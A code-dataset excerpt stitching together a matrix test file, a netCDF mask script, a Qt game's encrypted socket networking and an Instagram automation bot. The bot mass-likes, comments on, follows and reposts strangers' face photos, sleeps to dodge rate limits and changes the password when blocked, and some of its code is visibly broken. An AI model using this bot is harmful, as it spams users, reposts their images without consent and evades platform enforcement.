assert mf.digit_arr(32.624) == [3, 2, 6, 2, 4]
@describe('Matrix Functions')
def test_matrix_functions():
import scripts.matrix_functions as mf
@describe('Determinant')
def test_determinant():
@it('1x1 Matrix')
def _():
assert mf.determinant([[1]]) == 1
assert mf.determinant([[2.5]]) == 2.5
assert mf.determinant([[7]]) == 7
@it('2x2 Matrix')
def _():
assert mf.determinant([[1, 2], [3, 4]]) == -2
assert mf.determinant([[6, 4], [9, 7]]) == 6
assert mf.determinant([[8, 3], [2, 1]]) == 2
@it('3x3 Matrix')
def _():
assert mf.determinant([[1, 2, 3], [4, 5, 6], [7, 8, 9]]) == 0
assert mf.determinant([[6, 8, 1], [11, 2, 0], [7, 10, 7]]) == -436
assert mf.determinant([[1, 1, 1], [8, 7, 6], [0, 9, 99]]) == -81
@it('5x5 Irregular Matrix')
def _():
assert mf.determinant([
[6, 2, 8, 3, 7],
[2, 8, 1, 8, 1],
[7, 4, 11, 6, 2],
[15, 72, 1, 11, 19],
[22, 44, 94, 67, 1],
]) == -1008848
@describe('Make Matrix (Internal)')
def test_make_matrix():
@it('Empty matrix raises ValueError')
@assert_raises(ValueError)
def _():
mf.make_matrix([])
@it('2x2 Matrix')
def _():
assert mf.make_matrix([['1', 2], [3.0, '4.0']]) == [[1.0, 2.0], [3.0, 4.0]]
@it('3x3 Matrix')
def _():
assert mf.make_matrix([['1', 2, 3.0], ['4.0', 5, '6'], [7.0, '8', '9.0']]) == [[1.0, 2.0, 3.0], [4.0, 5.0, 6.0], [7.0, 8.0, 9.0]]
@it('4x4 Matrix')
def _():
assert mf.make_matrix([['1', 2, 3.0, '4.0'], [6, '1', 7.0, '8.6'], ['3', '2', 1, -5], [10, 11, 12.0, '-13.2']]) == [[1.0, 2.0, 3.0, 4.0], [6.0, 1.0, 7.0, 8.6], [3.0, 2.0, 1.0, -5.0], [10.0, 11.0, 12.0, -13.2]]
@it('5x5 Matrix')
def _():
assert mf.make_matrix([['1', 2, 3.0, '4.0', 5], [1, '9', '-8', 3, 1.0], [3, 3, 3, 3, 3], [-9, 7, 5, 3, 1.12], ['3.33', 6.2, -1, 9, 9]]) == [[1.0, 2.0, 3.0, 4.0, 5.0], [1.0, 9.0, -8.0, 3.0, 1.0], [3.0, 3.0, 3.0, 3.0, 3.0], [-9.0, 7.0, 5.0, 3.0, 1.12], [3.33, 6.2, -1.0, 9.0, 9.0]]
@describe('Add')
def test_add():
@it('Empty matrix raises ValueError')
@assert_raises(ValueError)
def _():
mf.add([], [])
@it('2x2 Matrix')
def _():
assert mf.add([[1, 2], [3, 4]],[[5.2, 2], [-3, -1]]) == [[6.2, 4], [0, 3]]
@it('3x3 Matrix')
def _():
assert mf.add([[1, 2, 3], [4, 5, 6], [7, 8, 9]], [[9, 7, 4], [7.1, -2, 0], [11, -7, 2]]) == [[10, 9, 7], [11.1, 3, 6], [18, 1, 11]]
@it('4x4 Matrix')
def _():
assert mf.add([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]], [[1, -2, 3, -4], [-5, 6, -7, 8], [9, -10, 11, -12], [-13, 14, -15, 16]]) == [[2, 0, 6, 0], [0, 12, 0, 16], [18, 0, 22, 0], [0, 28, 0, 32]]
@it('5x5 Matrix')
def _():
assert mf.add([[1, 2, 3, 4, 5], [6, 7, 8, 9, 10.1], [11, 12, 13, 14, 15], [1.6, 17, 13, 19, 20], [21, -22, 23, 24, 25]], [[7, 7, 7, 7, 7], [8, 8, 8, 8, 8], [9, -9, 9, -9, 9], [3, 4, 5, 6, 7], [11, 12, 13, 14, 14.1]]) == [[8, 9, 10, 11, 12], [14, 15, 16, 17, 18.1], [20, 3, 22, 5, 24], [4.6, 21, 18, 25, 27], [32, -10, 36, 38, 39.1]]
@describe('Subtract')
def test_subtract():
@it('Empty matrix raises ValueError')
@assert_raises(ValueError)
def _():
mf.subtract([], [])
@it('2x2 Matrix')
def _():
assert mf.subtract([[1, 2], [3, 4]], [[5.2, 2], [-3, -1]]) == [[-4.2, 0], [6, 5]]
@it('3x3 Matrix')
def _():
assert mf.subtract([[1, 2, 3], [4, 5, 6], [7, 8, 9]], [[9, 7, 4], [7.5, -2, 0], [11, -7, 2]]) == [[-8, -5, -1], [-3.5, 7, 6], [-4, 15, 7]]
@it('4x4 Matrix')
def _():
assert mf.subtract([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]], [[1, -2, 3, -4], [-5, 6, -7, 8], [9, -10, 11, -12], [-13, 14, -15, 16]]) == [[0, 4, 0, 8], [10, 0, 14, 0], [0, 20, 0, 24], [26, 0, 30, 0]]
@it('5x5 Matrix')
def _():
assert mf.subtract([[1, 2, 3, 4, 5], [6, 7, 8, 9, 10.5], [11, 12, 13, 14, 15], [1.6, 17, 13, 19, 20], [21, -22, 23, 24, 25]], [[7, 7, 7, 7, 7], [8, 8, 8, 8, 8], [9, -9, 9, -9, 9], [3, 4, 5, 6, 7], [11, 12, 13, 14, 14.1]]) == [[-6, -5, -4, -3, -2], [-2, -1, 0, 1, 2.5], [2, 21, 4, 23, 6], [-1.4, 13, 8, 13, 13], [10, -34, 10, 10, 10.9]]
@describe('Divide')
def test_divide():
@it('Empty matrix raises ValueError')
@assert_raises(ValueError)
def _():
mf.divide([], [])
@it('2x2 Matrix')
def _():
assert mf.divide([[3, 2], [3, 4]], [[2, 2], [-4, -1]]) == [[1.5, 1], [-0.75, -4]]
@it('3x3 Matrix')
def _():
assert mf.divide([[1, 2, 3], [4, 5, 6], [7, 8, 9]], [[2, 1, 1], [-1, -2, 1], [2, -2, 2]]) == [[0.5, 2.0, 3.0], [-4.0, -2.5, 6.0], [3.5, -4.0, 4.5]]
@it('4x4 Matrix')
def _():
assert mf.divide([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]], [[1, -2, 1, 2], [2, 2, -1, 1], [1, 2, 1, -1], [2, 1, 1, -1]]) == [[1.0, -1.0, 3.0, 2.0], [2.5, 3.0, -7.0, 8.0], [9.0, 5.0, 11.0, -12.0], [6.5, 14.0, 15.0, -16.0]]
@it('5x5 Matrix')
def _():
assert mf.divide([[1, 2, 3, 4, 5], [6, 7, 8, 9, 10.1], [11, 12, 13, 14, 15], [1.6, 17, 13, 19, 20], [21, -22, 23, 24, 25]], [[1, 2, 2, -2, 2], [1, -2, -1, 2, 2], [-2, 1, 1, -2, 1], [-1, 2, 1, -1, -2], [-1, 2, 2, -1, -2]]) == [[1.0, 1.0, 1.5, -2.0, 2.5], [6.0, -3.5, -8.0, 4.5, 5.05], [-5.5, 12.0, 13.0, -7.0, 15.0], [-1.6, 8.5, 13.0, -19.0, -10.0], [-21.0, -11.0, 11.5, -24.0, -12.5]]
@describe('Multiply')
def test_multiply():
@it('Empty matrix raises ValueError')
@assert_raises(ValueError)
def _():
mf.multiply([], [])
@it('2x2 Matrix')
def _():
assert mf.multiply([[1, 2], [3, 4]],[[5.5, 2], [-3, -1]]) == [[-0.5, 0], [4.5, 2]]
@it('3x3 Matrix')
def _():
assert mf.multiply([[1, 2, 3], [4, 5, 6], [7, 8, 9]], [[9, 7, 4], [7.1, -2, 0], [11, -7, 2]]) == [[56.2, -18, 10], [137.5, -24, 28], [218.8, -30, 46]]
@it('4x4 Matrix')
def _():
assert mf.multiply([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]], [[1, -2, 3, -4], [-5, 6, -7, 8], [9, -10, 11, -12], [-13, 14, -15, 16]]) == [[-34, 36, -38, 40], [-66, 68, -70, 72], [-98, 100, -102, 104], [-130, 132, -134, 136]]
@it('5x5 Matrix')
def _():
assert mf.multiply([[1, 2, 3, 4, 5], [6, 7, 8, 9, 10.1], [11, 12, 13, 14, 15], [1.6, 17, 13, 19, 20], [21, -22, 23, 24, 25]], [[7, 7, 7, 7, 7], [8, 8, 8, 8, 8], [9, -9, 9, -9, 9], [3, 4, 5, 6, 7], [11, 12, 13, 14, 14.1]]) == [[117, 72, 135, 90, 148.5], [308.1, 183.2, Almost(346.3), 221.4, Almost(375.41)], [497, 292, 555, 350, 599.5], [541.2, 346.2, 619.2, 424.2, 679.2], [525, 160, 623, 258, 698.5]]
@describe('Element-Wise Multiply')
def test_element_wise_multiply():
@it('Empty matrix raises ValueError')
@assert_raises(ValueError)
def _():
mf.element_wise_multiply([], [])
@it('2x2 Matrix')
def _():
assert mf.element_wise_multiply([[1, 2], [3, 4]],[[5.2, 2], [-3, -1]]) == [[5.2, 4], [-9, -4]]
@it('3x3 Matrix')
def _():
assert mf.element_wise_multiply([[1, 2, 3], [4, 5, 6], [7, 8, 9]], [[9, 7, 4], [7.1, -2, 0], [11, -7, 2]]) == [[9, 14, 12], [28.4, -10, 0], [77, -56, 18]]
@it('4x4 Matrix')
def _():
assert mf.element_wise_multiply([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]], [[1, -2, 3, -4], [-5, 6, -7, 8], [9, -10, 11, -12], [-13, 14, -15, 16]]) == [[1, -4, 9, -16], [-25, 36, -49, 64], [81, -100, 121, -144], [-169, 196, -225, 256]]
@it('5x5 Matrix')
def _():
assert mf.element_wise_multiply([[1, 2, 3, 4, 5], [6, 7, 8, 9, 10.1], [11, 12, 13, 14, 15], [1.5, 17, 13, 19, 20], [21, -22, 23, 24, 25]], [[7, 7, 7, 7, 7], [8, 8, 8, 8, 8], [9, -9, 9, -9, 9], [3, 4, 5, 6, 7], [11, 12, 13, 14, 14.1]]) == [[7, 14, 21, 28, 35], [48, 56, 64, 72, 80.8], [99, -108, 117, -126, 135], [4.5, 68, 65, 114, 140], [231, -264, 299, 336, 352.5]]
| 38.318493
| 413
| 0.42582
|
c05a3725f71337d8fc849530bab62b79c047f69e
| 5,371
|
py
|
Python
|
genesis/utils/make_mask.py
|
leifdenby/genesis
|
3e4942eac74fb9c69d9b3feedfce5aa745e3bf9c
|
[
"BSD-3-Clause"
] | 2
|
2019-12-18T15:39:06.000Z
|
2020-07-16T14:44:38.000Z
|
genesis/utils/make_mask.py
|
leifdenby/genesis
|
3e4942eac74fb9c69d9b3feedfce5aa745e3bf9c
|
[
"BSD-3-Clause"
] | 2
|
2019-12-26T11:23:11.000Z
|
2020-07-22T10:04:45.000Z
|
genesis/utils/make_mask.py
|
leifdenby/genesis
|
3e4942eac74fb9c69d9b3feedfce5aa745e3bf9c
|
[
"BSD-3-Clause"
] | 1
|
2019-12-18T16:48:39.000Z
|
2019-12-18T16:48:39.000Z
|
"""
Create mask files which can be used elsewhere
"""
import argparse
import inspect
import os
import xarray as xr
# register a progressbar so we can see progress of dask'ed operations with xarray
from dask.diagnostics import ProgressBar
from . import mask_functions
ProgressBar().register()
OUT_FILENAME_FORMAT = "{base_name}.mask.{mask_name}.nc"
class StoreDictKeyPair(argparse.Action):
"""
Custom parser so that we can provide extra values to mask functions
https://stackoverflow.com/a/42355279
"""
def __call__(self, parser, namespace, values, option_string=None):
my_dict = {}
for kv in values.split(","):
k, v = kv.split("=")
my_dict[k] = v
setattr(namespace, self.dest, my_dict)
class MissingInputException(Exception):
def __init__(self, missing_kwargs, *args, **kwargs):
self.missing_kwargs = missing_kwargs
def make_mask_name(method, method_kwargs):
method_kwargs = build_method_kwargs(method=method, kwargs=method_kwargs)
def include_kw_in_name(v):
if v == "base_name":
return False
else:
return type(method_kwargs[v]) in [float, int, str]
name = ".".join(
[method]
+ [
"{v}{val}".format(v=v, val=method_kwargs[v])
for v in method_kwargs.keys()
if include_kw_in_name(v)
]
)
return name
def build_method_kwargs(method, kwargs):
"""
Use the provided arguments together with default ones and check which are
still missing to satisfy the function signature
"""
fn = getattr(mask_functions, method)
fn_argspec = inspect.getargspec(fn)
needed_vars = fn_argspec.args
if fn_argspec.defaults is not None:
default_values = dict(
zip(fn_argspec.args[-len(fn_argspec.defaults) :], fn_argspec.defaults)
)
else:
default_values = {}
missing_kwargs = []
if "base_name" in kwargs and "base_name" not in needed_vars:
del kwargs["base_name"]
# we iterator over the functions required arguments and check if they've
# been passed in
for v in needed_vars:
if v in default_values:
if v in kwargs:
# attempt to type cast to the correct type
val = type(default_values.get(v))(kwargs[v])
kwargs[v] = val
else:
print(
"Using default value `{}` for argument `{}`".format(
default_values.get(v), v
)
)
kwargs[v] = default_values.get(v)
else:
if v not in kwargs:
missing_kwargs.append(v)
if len(missing_kwargs) > 0:
raise MissingInputException(missing_kwargs)
else:
return kwargs
def main(method, method_kwargs):
fn = getattr(mask_functions, method)
method_kwargs = build_method_kwargs(method=method, kwargs=method_kwargs)
mask = fn(**method_kwargs).squeeze()
if hasattr(fn, "description"):
mask.attrs["long_name"] = fn.description.format(**method_kwargs)
mask.name = make_mask_name(method, method_kwargs)
return mask
if __name__ == "__main__": # noqa
argparser = argparse.ArgumentParser(__doc__)
argparser.add_argument("base_name", type=str)
mask_function_names = [
o[0]
for o in inspect.getmembers(mask_functions)
if inspect.isfunction(o[1]) and not o[0].startswith("_")
]
argparser.add_argument("fn", choices=list(mask_function_names))
argparser.add_argument("--extra", action=StoreDictKeyPair, default={})
args = argparser.parse_args()
kwargs = dict(args.extra)
try:
kwargs = build_method_kwargs(method=args.fn, kwargs=kwargs)
except MissingInputException as e:
missing_kwargs = e.missing_kwargs
for v in missing_kwargs:
if v == "ds_profile":
case_name = args.base_name.split(".")[0]
filename = "{}.ps.nc".format(case_name)
if not os.path.exists(filename):
raise Exception(
"Could not find profile file, looked in "
"`{}`".format(filename)
)
kwargs[v] = xr.open_dataset(
filename, decode_times=False, chunks=dict(time=1)
)
elif v == "base_name":
kwargs["base_name"] = args.base_name
else:
filename = "{}.{}.nc".format(args.base_name, v)
if not os.path.exists(filename):
raise Exception(
"Can't find required var `{}` for mask "
"function `{}`, `{}`".format(v, args.fn, filename)
)
try:
kwargs[v] = xr.open_dataarray(
filename, decode_times=False, chunks=dict(zt=10)
)
except ValueError:
kwargs[v] = xr.open_dataarray(filename, decode_times=False)
mask = main(method=args.fn, method_kwargs=kwargs)
out_filename = OUT_FILENAME_FORMAT.format(
base_name=args.base_name, mask_name=mask.name
)
mask.to_netcdf(out_filename)
print("Wrote mask to `{}`".format(out_filename))
| 30.174157
| 82
| 0.587786
|
0189a0a202a5f97fe328b5ffb31e7d23c5baa424
| 4,252
|
py
|
Python
|
src/network/network_thread.py
|
insoPL/QtDraughts
|
62368e6523bf3dd50752ae5dffc65e946775f58d
|
[
"MIT"
] | null | null | null |
src/network/network_thread.py
|
insoPL/QtDraughts
|
62368e6523bf3dd50752ae5dffc65e946775f58d
|
[
"MIT"
] | null | null | null |
src/network/network_thread.py
|
insoPL/QtDraughts
|
62368e6523bf3dd50752ae5dffc65e946775f58d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import socket
from PyQt5.QtCore import QThread, pyqtSignal
import logging
import nacl.utils
import nacl.secret
import nacl.hash
from nacl.exceptions import CryptoError
class _NetworkThread(QThread):
got_connection = pyqtSignal()
connection_error = pyqtSignal(str)
new_msg = pyqtSignal(str)
def __init__(self, target_ip, port, passwd):
QThread.__init__(self)
self.port = int(port)
self.mode = None
self.target_ip = target_ip
self.socket = None
self.running = True
self.server_socket = None
keyhash = nacl.hash.blake2b(passwd.encode('ascii'), digest_size=16)
self.secret_box = nacl.secret.SecretBox(keyhash)
def send_raw(self, msg):
# logging.debug("[raw network pocket send] "+msg)
msg = self.secret_box.encrypt(msg.encode('ascii'))
self.socket.send(msg)
def recive_raw(self):
msg = self.socket.recv(1024)
try:
msg = self.secret_box.decrypt(msg)
except CryptoError:
#self.connection_error.emit("Wrong password")
#self.running = False
return ""
msg = msg.decode('ascii')
# logging.debug("[raw network pocket recived] "+msg)
return msg
def __del__(self):
self.quit()
self.wait()
class NetworkClient(_NetworkThread):
def run(self):
self.mode = "client"
logging.info("Connecting to :" + str(self.target_ip))
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.socket.connect((self.target_ip, self.port))
logging.debug("Connection sucessful")
if self.recive_raw() != "welcome":
self.connection_error.emit("Wrong Password")
return
self.send_raw("welcomeback")
self.got_connection.emit()
self.socket.settimeout(1)
while self.running:
try:
msg = self.recive_raw()
if msg == "":
break
self.new_msg.emit(msg)
except socket.timeout:
continue
except socket.error as err:
logging.debug("SOCKET ERROR: %s" % err)
self.connection_error.emit(str(err))
return
finally:
self.socket.close()
logging.debug("Server Closed")
class NetworkServer(_NetworkThread):
def run(self):
self.mode = "server"
logging.info("Hosting :" + str(self.target_ip))
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.server_socket.bind((self.target_ip, self.port))
logging.debug("Server ready for network")
self.server_socket.settimeout(1)
self.server_socket.listen(1)
while self.running:
try:
self.socket, clienta_ddr = self.server_socket.accept()
except socket.timeout:
continue
break
if not self.running:
logging.debug("Hosting canceled")
return
logging.debug("Connection established.")
self.send_raw("welcome")
if self.recive_raw() != "welcomeback":
self.connection_error.emit("Wrong Password")
return
self.got_connection.emit()
self.socket.settimeout(1)
while self.running:
try:
msg = self.recive_raw()
if msg == "":
break
self.new_msg.emit(msg)
except socket.timeout:
continue
except socket.error as err:
logging.debug("SOCKET ERROR: %s" % err)
self.server_socket.close()
self.server_socket = None
self.connection_error.emit("Connection error.")
finally:
if self.socket is not None:
self.socket.close()
if self.server_socket is not None:
self.server_socket.close()
logging.debug("Server Closed")
| 32.212121
| 78
| 0.5508
|
ef04807445887ef401cb4c8218bcd3c992d61ab5
| 23,609
|
py
|
Python
|
instabotai/ai.py
|
Chililove/instabotai
|
07cfbae22abf3c508d3ca13308149dc22991aeff
|
[
"Apache-2.0"
] | null | null | null |
instabotai/ai.py
|
Chililove/instabotai
|
07cfbae22abf3c508d3ca13308149dc22991aeff
|
[
"Apache-2.0"
] | null | null | null |
instabotai/ai.py
|
Chililove/instabotai
|
07cfbae22abf3c508d3ca13308149dc22991aeff
|
[
"Apache-2.0"
] | null | null | null |
import os
from instabot import Bot
import argparse
import time
#import threading
import random
import sys, stat
from mtcnn.mtcnn import MTCNN
import cv2
#import json
import random
#import logging
import shutil
try:
input = raw_input
except NameError:
pass
COOKIES = {}
bot = Bot(do_logout=True)
class Bots(object):
def __init__(self):
self.points = 1000
def watch_stories(username, time_sleep):
Bots.save_user_info(ig_username, "Starting story viewer")
user_to_get_likers_of = bot.get_user_id_from_username(username)
time_sleep = int(time_sleep)
current_user_id = user_to_get_likers_of
total_stories = 0
error_sleep = 0
error_sleeps = 0
while True:
try:
# GET USER FEED
if not bot.api.get_user_feed(current_user_id):
print("Can't get feed of user_id=%s" % current_user_id)
Bots.save_user_info(ig_username, "Can't get feed of user_id=%s" % current_user_id)
# GET MEDIA LIKERS
user_media = random.choice(bot.api.last_json["items"])
if not bot.api.get_media_likers(media_id=user_media["pk"]):
Bots.save_user_info(ig_username,
"Can't get media likers of media_id='%s' by user_id='%s'"
% (user_media["pk"], current_user_id)
)
likers = bot.api.last_json["users"]
liker_ids = [
str(u["pk"]) for u in likers if not u["is_private"] and "latest_reel_media" in u
][:20]
# WATCH USERS STORIES
if bot.watch_users_reels(liker_ids):
time.sleep(time_sleep)
Bots.save_user_info(ig_username, "sleeping for " + str(time_sleep) + " seconds")
bot.logger.info("Total stories viewed: %d" % bot.total["stories_viewed"])
Bots.save_user_info(ig_username, "Total stories viewed: %d" % bot.total["stories_viewed"])
error_sleep = 0
error_sleeps = 0
if bot.total["stories_viewed"] > 1900:
total_stories += 2000
Bots.save_user_info(ig_username, "Total stories watched " + str(total_stories))
print("Total stories watched " + str(total_stories))
bot.total["stories_viewed"] = 0
print("sleeping for 420 sec")
Bots.save_user_info(ig_username, "sleeping for 420 sec")
Bots.payment_system()
time.sleep(420 + random.random())
if total_stories > 19000:
time.sleep(500)
Bots.save_user_info(ig_username, "sleeping for 500 seconds")
# CHOOSE RANDOM LIKER TO GRAB HIS LIKERS AND REPEAT
current_user_id = random.choice(liker_ids)
if random.random() < 0.05:
time.sleep(1)
current_user_id = user_to_get_likers_of
bot.logger.info("Sleeping and returning back to original user_id=%s"% current_user_id)
Bots.save_user_info(ig_username, "Sleeping and returning back to original user_id=%s"% current_user_id)
time.sleep(10 * random.random() + 1)
error_sleep += 1
if error_sleep == 2:
error_sleep = 0
print("sleeping for 1640 seconds")
Bots.save_user_info(ig_username, "sleeping for 320 seconds")
time.sleep(16 + random.random())
except Exception as e:
# If something went wrong - sleep long and start again
bot.logger.info(e)
error_sleeps += 1
if error_sleeps == 50:
bot.logger.info("sleeping for 310 seconds")
Bots.save_user_info(ig_username, "sleeping for 310 seconds")
time.sleep(312 + random.random())
Bots.change_password_on_block()
print(bot.api.total_challenge)
current_user_id = user_to_get_likers_of
time.sleep(20 * random.random() + 5)
def change_password_on_block():
with open(ig_username + "check_blocked.txt", "w+") as f:
blocked = f.read()
blocked = str(blocked)
if blocked == "3":
Bots.save_user_info(ig_username, "Change password")
bot.logger.info("password changed")
x = random.randrange(1, 3)
new_password = ig_password + str(x)
bot.api.change_password(new_password)
bot.logger.info("logged in")
bot.api.login(username="japanheaven", password=new_password)
blocked = f.write("0")
def save_user_info(username, logoutput):
global ig_username
ig_username = username
with open("static/" + username + 'info.txt', 'a+')as f:
s = f.read()
f.seek(0)
f.write(logoutput + "<hr>\n" + s)
def user_login(username=None, password=None, proxys=None):
username = username
global ig_password
ig_password = password
proxys = None
bot.api.login(username=username, password=password, proxy=proxys, use_cookie=True, is_threaded=True)
Bots.save_user_info(username, "logged in as " + username)
def face_detection(username):
x = 0
''' Get user media and scan it for a face'''
user_id = bot.get_user_id_from_username(username)
medias = bot.get_user_medias(user_id, filtration=False)
for media in medias:
while x < 1:
try:
bot.logger.info(media)
path = bot.download_photo(media, folder=username)
img = cv2.imread(path)
detector = MTCNN()
detect = detector.detect_faces(img)
if not detect:
Bots.save_user_info(ig_username, "no face detected " + bot.get_link_from_media_id(media))
bot.logger.info("save user info")
bot.logger.info("no face detected " + bot.get_link_from_media_id(media))
x += 1
elif detect:
Bots.save_user_info(ig_username, "there was a face detected")
bot.logger.info("save user info")
bot.logger.info("there was a face detected")
bot.api.like(media)
display_url = bot.get_link_from_media_id(media)
bot.logger.info("liked " + display_url + " by " + username)
Bots.save_user_info(ig_username, "liked " + display_url + " by " + username)
Bots.payment_system()
x += 1
else:
x += 1
except Exception as e:
Bots.save_user_info(ig_username, str(e))
bot.logger.info(e)
x += 1
shutil.rmtree(username, ignore_errors=True) # Remove dir username after scanning
def face_detection_repost(username, caption):
x = 0
''' Get user media and scan it for a face'''
user_id = bot.get_user_id_from_username(username)
medias = bot.get_user_medias(user_id, filtration=False)
for media in medias:
while x < 1:
try:
bot.logger.info(media)
path = bot.download_photo(media, folder=username)
img = cv2.imread(path)
detector = MTCNN()
detect = detector.detect_faces(img)
if not detect:
bot.logger.info("no face detected " + bot.get_link_from_media_id(media))
Bots.save_user_info(ig_username, "no face detected " + bot.get_link_from_media_id(media))
x += 1
elif detect:
bot.logger.info("there was a face detected")
Bots.save_user_info(ig_username, "==> There was a face detected! <==")
bot.api.upload_photo(path, caption=caption)
does_exist = bot.get_media_comments(media, only_text=True)
if str(username) in does_exist:
x += 1
print("image has been commented")
else:
display_url = bot.get_link_from_media_id(media)
bot.logger.info("reposted " + display_url + " by " + username)
Bots.save_user_info(ig_username, "reposted " + display_url + " by " + username)
Bots.payment_system()
x += 1
else:
x += 1
except Exception as e:
bot.logger.info(e)
x += 1
Bots.save_user_info(ig_username, str(e))
shutil.rmtree(username, ignore_errors=True) # Remove dir username after scanning
def face_detection_follow(username):
Bots.save_user_info(ig_username, "No Worries pls wait 10-120 seconds")
x = 0
''' Get user media and scan it for a face'''
user_id = bot.get_user_id_from_username(username)
medias = bot.get_user_medias(user_id, filtration=False)
for media in medias:
while x < 1:
try:
bot.logger.info(media)
path = bot.download_photo(media, folder=username)
img = cv2.imread(path)
detector = MTCNN()
detect = detector.detect_faces(img)
if not detect:
bot.logger.info("no face detected " + bot.get_link_from_media_id(media))
Bots.save_user_info(ig_username, "no face detected " + bot.get_link_from_media_id(media))
x += 1
elif detect:
bot.logger.info("there was a face detected")
Bots.save_user_info(ig_username, "there was a face detected")
bot.api.follow(user_id)
does_exist = bot.get_media_comments(media, only_text=True)
if str(username) in does_exist:
x += 1
bot.logger.info("user has been followed")
else:
display_url = bot.get_link_from_media_id(media)
Bots.save_user_info(ig_username, "followed " + username)
bot.logger.info("followed " + username)
Bots.payment_system()
x += 1
else:
x += 1
except Exception as e:
bot.logger.info(e)
x += 1
Bots.save_user_info(ig_username, str(e))
shutil.rmtree(username, ignore_errors=True) # Remove dir username after scanning
def face_detection_comment(username, comment):
x = 0
''' Get user media and scan it for a face'''
user_id = bot.get_user_id_from_username(username)
medias = bot.get_user_medias(user_id, filtration=False)
for media in medias:
while x < 1:
try:
bot.logger.info(media)
path = bot.download_photo(media, folder=username)
img = cv2.imread(path)
detector = MTCNN()
detect = detector.detect_faces(img)
if not detect:
bot.logger.info("no face detected " + bot.get_link_from_media_id(media))
Bots.save_user_info(ig_username, "no face detected " + bot.get_link_from_media_id(media))
x += 1
elif detect:
comment = Bots.convert_usernames_to_list(comment)
comment = random.choice(comment)
bot.logger.info("there was a face detected")
Bots.save_user_info(ig_username, "there was a face detected")
bot.api.comment(media, comment)
does_exist = bot.get_media_comments(media, only_text=True)
if str(username) in does_exist:
x += 1
print("image has been commented")
else:
display_url = bot.get_link_from_media_id(media)
bot.logger.info("commented " + display_url + " by " + username)
Bots.save_user_info(ig_username, "commented " + display_url + " by " + username)
Bots.payment_system()
x += 1
else:
x += 1
except Exception as e:
Bots.save_user_info(ig_username, "wait 1 min")
bot.logger.info(e)
x += 1
shutil.rmtree(username, ignore_errors=True) # Remove dir username after scanning
def like_followers(username, time_sleep):
Bots.save_user_info(ig_username, "Scraping users pls wait 2-4 min")
user_id = bot.get_user_id_from_username(username)
followers = bot.get_user_followers(user_id, nfollows=6000)
for user in followers:
pusername = bot.get_username_from_user_id(user)
Bots.face_detection(pusername)
time.sleep(int(time_sleep))
def like_following(username, time_sleep):
Bots.save_user_info(ig_username, "Scraping users pls wait 2-4 min")
Bots.save_user_info(ig_username, "Scraping users pls wait 2-4 min")
user_id = bot.get_user_id_from_username(username)
following = bot.get_user_following(user_id)
for user in following:
pusername = bot.get_username_from_user_id(user)
Bots.face_detection(pusername)
time.sleep(int(time_sleep))
def like_hashtags(hashtag, time_sleep):
'''
like hashtags
@params: hashtag (string),
@params: time_sleep (int),
'''
Bots.save_user_info(ig_username, "Scraping users pls wait 2-4 min")
hashtags = bot.get_hashtag_users(hashtag)
while True:
hashtags = Bots.convert_usernames_to_list(hashtag)
for hashtag in hashtags:
hashtags = bot.get_hashtag_users(hashtag)
bot.logger.info("Hashtag selected: " + hashtag)
for user in hashtags:
pusername = bot.get_username_from_user_id(user)
Bots.face_detection(pusername)
time.sleep(int(time_sleep))
def user_hashtag_comment(hashtag, comment, time_sleep):
'''
comment a user hashtags
@params: hashtag (string),
@params: comment (sting),
@params: time_sleep (int),
'''
while True:
hashtags = Bots.convert_usernames_to_list(hashtag)
for hashtag in hashtags:
hashtags = bot.get_hashtag_users(hashtag)
bot.logger.info("Hashtag selected: " + hashtag)
for user in hashtags:
pusername = bot.get_username_from_user_id(user)
Bots.face_detection_comment(pusername, comment)
time.sleep(int(time_sleep))
def media_hashtag_comment(hashtags, comment, time_sleep):
'''
comment a media hashtags
@params: hashtags (string),
@params: comment[sting),
@params: time_sleep(int),
'''
Bots.save_user_info(ig_username, "Scraping users pls wait 2-4 min")
while True:
hashtags = Bots.convert_usernames_to_list(hashtags)
for hashtag in hashtags:
hashtags = bot.get_total_hashtag_medias(hashhtag)
for user in hashtags:
pusername = bot.get_username_from_user_id(user)
Bots.face_detection_comment(pusername, comment)
time.sleep(int(time_sleep))
def unfollow_users():
bot.unfollow_everyone()
def unfollow_non_followers():
bot.unfollow_non_followers()
def convert_usernames_to_list(usernames):
newlist = []
''' convert usernames or hashtags to a list '''
try:
for username in usernames.split(", "):
newlist.append(username)
list_usernames = newlist
except:
for username in usernames.split(","):
newlist.append(username)
list_usernames = newlist
else:
usernames = list_usernames
return list_usernames
def repost_users_images(usernames, caption, time_sleep):
'''
get users images and repost them
@params: usernames (string),
@params: caption (sting),
@params: time_sleep(int),
'''
print(usernames)
Usernames = Bots.convert_usernames_to_list(usernames)
print(Usernames)
for username in Usernames:
Bots.face_detection_repost(username, caption)
time.sleep(time_sleep)
def get_points():
try:
points = open(ig_username + "x.txt", "r")
print("points")
output = points.read()
points.close()
points = output
if not points:
Bots.stop()
return points
except:
points = open(ig_username + "x.txt", "w")
os.chmod(ig_username + "x.txt", 0o777)
points.write("50")
print("points")
output = points.read()
points.close()
points = output
return points
def stop():
print("Buy 20.000 more COINS send 0.001 BTC to 12R5b4rLyNL8cC2HYQi5NpdPNaaAxPnmfe")
print("To get key when bought talk to us here: https://web.telegram.org/#/im?p=@instabotai")
exit()
def payment_system():
points = Bots.get_points()
print("You Have :" + str(points) + " coins left")
Bots.save_user_info(ig_username, "You Have :" + str(points) + " coins left")
increase = open(ig_username + "x.txt", "w+")
points = int(points)
points -= 1
if points < 0:
increase.write("0")
print("Buy More Coins Here https://www.patreon.com/instabotai")
Bots.save_user_info(ig_username, "Buy for 1 month for only $29 with unlimited tasks <a href='https://www.fiverr.com/hourapp/manage-your-instagram-account-with-ai'> Here!</a>")
print("To get key when bought talk to us here: https://web.telegram.org/#/im?p=@instabotai")
Bots.stop()
increase.write(str(points))
increase.close()
print("=" * 30)
Bots.save_user_info(ig_username, "=" * 30)
